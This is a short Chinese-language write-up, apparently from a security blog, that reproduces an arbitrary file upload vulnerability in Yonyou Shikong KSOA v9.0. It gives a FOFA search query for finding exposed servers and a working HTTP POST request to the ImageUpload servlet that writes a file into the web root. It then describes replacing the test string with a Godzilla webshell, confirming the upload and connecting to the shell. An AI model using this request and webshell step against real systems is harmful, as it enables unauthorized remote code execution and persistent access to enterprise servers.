用友时空KSOA ImageUpload任意文件上传漏洞复现

¶产品介绍：

​ 用友时空KSOA是建立在SOA理念指导下研发的新一代产品，是根据流通企业最前沿的I需求推出的统一的IT基础架构，它可以让流通企业各个时期建立的IT系统之间彼此轻松对话，帮助流通企业保护原有的IT投资，简化IT管理，提升竞争能力，确保企业整体的战略目标以及创新活动的实现。

¶影响范围：

​ 用友时空企业信息融通平台KSOA v9.0

¶fofa语句:

app="用友-时空KSOA"

¶漏洞复现：

访问页面：

​ 在此页面抓包发送到重放器，构造POC如下：（加上抓取的其他请求字段也可以，不影响结果,请求字段随便给）

POST /servlet/com.sksoft.bill.ImageUpload?filename=9.txt&filepath=/ HTTP/1.1
Host: [IP:port]
Content-Length: 10

yyskupload

访问http://IP:port/pictures/9.txt

上传成功！！！

这里把yyskupload修改成想上传的木马shell（我上传的是哥斯拉的马）

访问一下

空白页没有报错说明上传成功！

哥斯拉直接连接

HelloWorld😘😘😘